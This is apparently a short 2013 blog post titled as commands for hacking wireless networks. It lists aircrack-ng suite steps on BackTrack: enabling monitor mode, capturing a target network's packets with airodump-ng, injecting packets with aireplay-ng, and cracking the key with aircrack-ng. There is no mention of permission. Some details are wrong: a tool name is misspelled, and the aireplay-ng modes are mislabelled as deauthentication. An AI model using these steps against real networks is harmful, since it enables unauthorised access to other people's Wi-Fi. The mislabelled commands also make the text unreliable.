Saturday 16 February 2013

software requirements


software requirements
aircracking-ng

Back track

_________________________________________________________________________

** COMMANDS FOR HACKING WIRELESS:- **
*******************************************
1. **iwconfig (to check wireless name)**

2. **airmon-ng start (card name)**

3. **airodump-ng (monitor mode enable card name)**

now ctrl+c to stop

4. **airdump-ng -c (channel) --bssid (bssid number) -w crack (monitor mode enabled card name)**
To collect the data packets in the file.

c> Channel

w> Write

crack> File name(any name)

5. Open new konsole terminal for 5th command i.e.

To send the de-authentication packets.

**aireplay-ng -1 0 -a (bssid) (monitor mode enable card)**

6. To send the de-authentication packets again n again

**aireplay-ng -3 -b (bssid) (monitor mode enable card)**

7. Open New konsole for 7th command

To capture the password from the crack file.

**aircrack-ng crack-01.cap**

No comments:

Post a Comment